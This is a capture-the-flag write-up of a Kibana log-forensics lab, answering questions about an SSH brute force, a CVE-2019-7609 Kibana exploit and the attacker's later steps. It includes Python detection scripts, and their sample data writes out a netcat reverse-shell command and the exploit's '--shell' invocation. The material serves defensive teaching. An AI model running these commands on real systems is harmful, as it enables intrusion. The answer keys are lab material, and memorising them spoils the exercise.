FaresMorcy

GitTheGate Lab


Last updated 5 months ago

Q1) Using the "View Surrounding Documents" option, find the ID of the document that is 14 documents before (older) the id GDQOB3IBwJHf9VOW-r0Y?

_id: GDQOB3IBwJHf9VOW-r0Y

Answer: tzQOB3IBwJHf9VOW-Lyd

Q2) Using the "View Surrounding Documents" option, find the IP of the document that is 16 documents after (newer) the id vDQOB3IBwJHf9VOW-Lyd?

Answer: 191.189.39.130

Q3) How many requests have come from the IP address 2.49.53.218 between the 6th of May and the 13th of May? (time is in UTC)

ip: 2.49.53.218

Set Kibana's dateFormat:tz advanced setting to UTC before picking the date range; the default ("Browser") shifts the day boundaries to your local time zone and can change the count.

Answer: 7

Q4) What percentage of logs are from windows 8 machines on the 11th of May? (time is in UTC)

Answer: 21.74%

Q5) How many 503 errors were there on the 8th of May? (time is in UTC)

response: 503

Answer: 8

Q6) How many connections to the host "www.elastic.co" were made on the 12th of May? (time is in UTC)

host: www.elastic.co

Answer: 82

Q7) What is the second most common extension of files being accessed on the 12th of May? (time is in UTC)

Answer: .gz

Q8) Find the first IP address to connect to the host elastic-elastic-elastic.org on the 12th of May. (time is in UTC)

host: "elastic-elastic-elastic.org"

Answer: 114.246.225.218

Q9) What was the username used that failed to log in on the 15th of May at 10:44 pm? (time is in UTC)

event.type: "authentication_failure"

Answer: deploy

Q10) According to the logs, which vulnerable version of Kibana was identified as running in the stack?

Answer: 7.6.2

Q11) Using current data in the auditbeat index, what is the name of the elasticsearch node? (one word)

Answer: elkstack

Q12) What is the name of the beat to collect windows logs? (one word)

Answer: winlogbeat

Q13) What is the name of the beat that sends network data? (one word)

Answer: packetbeat

Q14) How many fields are in the auditbeat-* index pattern?

Answer: 437

Q15) On the 14th of May, how many failed authentication attempts did the host server receive? (time is in UTC)

event.type: authentication_failure

Answer: 762

Q16) On the 13th and 14th of May, how many bytes were received by the source IP 159.89.203.214 (time is in UTC)

source.ip: "159.89.203.214"

Answer: 492,919

Q17) What username did they crack?

event.type: "authentication_failure"
event.type: "authentication_success"

Look for the account that shows up repeatedly in the failure stream and then in a later success from the same source IP.

Answer: johnny

Q18) What host was attacked?

Answer: sshbox

Q19) How many were failed attempts made on the machine?

event.type: "authentication_failure"

Answer: 12523

Q20) What time was the last failed attempted login?

event.type: "authentication_failure" and host.name: "sshbox"

Answer: 11:39:31

Q21) What time did the attacker successfully login?

Based on the scenario, the attack is believed to have occurred on May 25th between 9:00 AM and 11:30 AM.

Answer: 11:50:13
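The Q17 to Q21 hunt above is the classic brute-force-then-success pattern. The following is an added example, not part of the lab write-up: it runs the same logic over constructed auditbeat-style login events (flattened ECS fields: event.type, host.name, user.name, source.ip, @timestamp). The host names, timestamps, users and IPs are placeholders, not lab data, and the detection keys on source IP rather than username because a spray rotates accounts.

```python
"""Triage of auditbeat SSH authentication events (Q17-Q21 style).

Added example, not part of the lab write-up. SAMPLE_EVENTS is constructed,
not lab data; each dict holds the flattened ECS fields the auditbeat
system/login dataset emits. Dates and IPs are placeholders.
"""
from collections import Counter
from datetime import datetime, timezone


def _ts(value):
    """Parse the @timestamp format Beats emit (UTC, millisecond precision)."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def _ev(ts, host, etype, user, ip):
    return {"@timestamp": ts, "host.name": host, "event.type": etype,
            "user.name": user, "source.ip": ip}


# Constructed sample: a spray against "sshbox" from 203.0.113.45 that ends in
# a success, one legitimate admin login, and noise from another host.
SAMPLE_EVENTS = [
    _ev("2020-05-25T09:01:05.000Z", "sshbox", "authentication_failure", "root",   "203.0.113.45"),
    _ev("2020-05-25T09:01:06.000Z", "sshbox", "authentication_failure", "admin",  "203.0.113.45"),
    _ev("2020-05-25T09:30:00.000Z", "sshbox", "authentication_success", "deploy", "10.0.0.5"),
    _ev("2020-05-25T10:12:40.000Z", "sshbox", "authentication_failure", "johnny", "203.0.113.45"),
    _ev("2020-05-25T11:39:31.000Z", "sshbox", "authentication_failure", "johnny", "203.0.113.45"),
    _ev("2020-05-25T10:12:41.000Z", "sshbox", "authentication_failure", "johnny", "203.0.113.45"),  # out of order on purpose
    _ev("2020-05-25T11:50:13.000Z", "sshbox", "authentication_success", "johnny", "203.0.113.45"),
    _ev("2020-05-25T11:00:00.000Z", "sshbox", "authentication_failure", "test",   "203.0.113.45"),
    _ev("2020-05-25T11:05:00.000Z", "webbox", "authentication_failure", "root",   "198.51.100.7"),
]


def host_events(events, host, etype=None):
    """Equivalent of host.name:"<host>" [and event.type:"<etype>"], time-ordered."""
    sel = [e for e in events
           if e["host.name"] == host and (etype is None or e["event.type"] == etype)]
    return sorted(sel, key=lambda e: _ts(e["@timestamp"]))


def failed_attempt_count(events, host):
    return len(host_events(events, host, "authentication_failure"))


def last_failed_login(events, host):
    fails = host_events(events, host, "authentication_failure")
    return fails[-1]["@timestamp"] if fails else None


def usernames_tried(events, host):
    """Accounts the spray targeted, most-hit first."""
    return Counter(e["user.name"]
                   for e in host_events(events, host, "authentication_failure")).most_common()


def first_success_after_spray(events, host, min_failures=5):
    """First success preceded by >= min_failures failures from the same source IP.

    Keying on source.ip rather than user.name matters: a spray rotates
    usernames, so the per-user failure count stays low while the per-source
    count is the real signal. A success with no prior failures from its
    source (the "deploy" login above) is left alone.
    """
    fails_by_ip = Counter()
    for e in host_events(events, host):
        if e["event.type"] == "authentication_failure":
            fails_by_ip[e["source.ip"]] += 1
        elif (e["event.type"] == "authentication_success"
              and fails_by_ip[e["source.ip"]] >= min_failures):
            return {"time": e["@timestamp"], "user": e["user.name"],
                    "source_ip": e["source.ip"], "prior_failures": fails_by_ip[e["source.ip"]]}
    return None


if __name__ == "__main__":
    print("failed attempts:", failed_attempt_count(SAMPLE_EVENTS, "sshbox"))
    print("last failure:   ", last_failed_login(SAMPLE_EVENTS, "sshbox"))
    print("usernames tried:", usernames_tried(SAMPLE_EVENTS, "sshbox"))
    print("cracked login:  ", first_success_after_spray(SAMPLE_EVENTS, "sshbox"))
```

Against real auditbeat data you would feed the same functions the hits of a scroll or search query on the auditbeat-* index; the sort step matters because Discover exports and search pages are not guaranteed to be in time order.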

Q22) What tool did the attacker use to get the exploit onto the machine?

Answer: git

Q23) Shortly after getting the exploit on the machine, the attacker used vim to create a file. What is the name of that file?

Answer: ElasticCTFisFun!

Q24) What is the filename of the exploit that was run?

Answer: CVE-2019-7609-kibana-rce.py

Q25) What is the first ID of the log that shows the exploit being run?

agent.hostname:"sshbox" and *CVE-2019-7609-kibana-rce.py*

Answer: _SHbS3IBCEolQs9lAD3z

Q26) What parameter turned the script from testing to exploiting?

Answer: --shell

Q27) Determining the destination IP is key to tracing the attacker’s actions. What is the destination IP address where the malicious shell was sent?

agent.hostname:"sshbox" and process.name:"nc"

Answer: 10.116.0.2

Q28) Identifying new users is vital to uncovering unauthorized access. What was the name of the user they created?

process.name: useradd

Answer: Thanks4Playing

The exploit the attacker cloned (Q22 to Q24) comes from this repository:

https://github.com/LandGrey/CVE-2019-7609
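Q22 to Q28 are all answered from auditbeat process execution records: which tool fetched the exploit, the file edited with vim, the exploit run and the parameter that switched it to exploitation, the netcat destination, and the useradd call. The block below is an added example, not part of the lab write-up, that reconstructs that timeline from constructed events (flattened ECS fields process.name, process.args, user.name, @timestamp). The argument layout of the exploit invocation (-u <kibana url>, -host, -port, --shell) is assumed from the tool's README and the IPs, file names and user names are placeholders, not lab data.

```python
"""Post-exploitation timeline from auditbeat process events (Q22-Q28 style).

Added example, not part of the lab write-up. SAMPLE_PROCS is constructed,
not lab data. The exploit argument layout is assumed from the tool's README;
verify against the real log before reusing the matcher.
"""
import re

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
EXPLOIT = "CVE-2019-7609-kibana-rce.py"


def _p(ts, user, args):
    return {"@timestamp": ts, "host.name": "sshbox", "user.name": user,
            "process.name": args[0], "process.args": args}


# Constructed sample, in the order the lab's questions describe, plus noise.
SAMPLE_PROCS = [
    _p("2020-05-25T11:52:01.000Z", "johnny", ["git", "clone", "https://github.com/LandGrey/CVE-2019-7609"]),
    _p("2020-05-25T11:52:40.000Z", "johnny", ["vim", "notes.txt"]),
    _p("2020-05-25T11:53:00.000Z", "johnny", ["ls", "-la"]),                                   # benign noise
    _p("2020-05-25T11:55:10.000Z", "johnny", ["python", EXPLOIT, "-u", "http://127.0.0.1:5601"]),  # test run
    _p("2020-05-25T11:56:30.000Z", "johnny", ["python", EXPLOIT, "-u", "http://127.0.0.1:5601",
                                               "-host", "203.0.113.45", "-port", "4444", "--shell"]),
    _p("2020-05-25T11:56:31.000Z", "kibana", ["nc", "-e", "/bin/sh", "203.0.113.45", "4444"]),
    _p("2020-05-25T11:58:00.000Z", "root",   ["nc", "-l", "-p", "8080"]),                      # listener, no target
    _p("2020-05-25T12:03:10.000Z", "root",   ["useradd", "-m", "-s", "/bin/bash", "svc-backup"]),
]


def exploit_runs(events, script=EXPLOIT):
    """Each execution of the script; --shell marks the live run, anything else a test."""
    runs = []
    for e in sorted(events, key=lambda e: e["@timestamp"]):  # same ISO format, so string order is time order
        if any(a.endswith(script) for a in e["process.args"]):
            runs.append({"time": e["@timestamp"], "user": e["user.name"],
                         "mode": "exploit" if "--shell" in e["process.args"] else "test"})
    return runs


def netcat_destinations(events):
    """Outbound nc/ncat invocations with a literal IPv4 target; listeners are skipped."""
    out = []
    for e in events:
        if e["process.name"] not in ("nc", "ncat", "netcat"):
            continue
        args = e["process.args"][1:]
        ip = next((a for a in args if IPV4.match(a)), None)
        if ip is None:
            continue
        i = args.index(ip)
        port = int(args[i + 1]) if i + 1 < len(args) and args[i + 1].isdigit() else None
        out.append({"time": e["@timestamp"], "user": e["user.name"], "dst_ip": ip,
                    "dst_port": port, "spawns_shell": "-e" in args or "-c" in args})
    return out


def created_users(events):
    """useradd takes the login name as its last positional argument."""
    found = []
    for e in events:
        if e["process.name"] == "useradd":
            positional = [a for a in e["process.args"][1:] if not a.startswith("-")]
            if positional:
                found.append((e["@timestamp"], positional[-1]))
    return found


def attack_timeline(events):
    """Ordered (time, stage, detail) tuples covering the steps the lab asks about."""
    stages = []
    for e in events:
        name, args = e["process.name"], e["process.args"]
        if name == "git" and "clone" in args:
            stages.append((e["@timestamp"], "download", args[-1]))
        elif name == "vim":
            stages.append((e["@timestamp"], "edit", args[-1]))
    stages += [(r["time"], r["mode"], EXPLOIT) for r in exploit_runs(events)]
    stages += [(d["time"], "reverse-shell", f'{d["dst_ip"]}:{d["dst_port"]}')
               for d in netcat_destinations(events)]
    stages += [(t, "user-created", u) for t, u in created_users(events)]
    return sorted(stages)


if __name__ == "__main__":
    for time, stage, detail in attack_timeline(SAMPLE_PROCS):
        print(f"{time}  {stage:<14} {detail}")
```

The one-second gap between the --shell run and the nc execution under the kibana user is the relationship Q25 to Q27 ask you to establish by hand: the exploit is executed by the SSH user, but the reverse shell is spawned by the service the exploit targets.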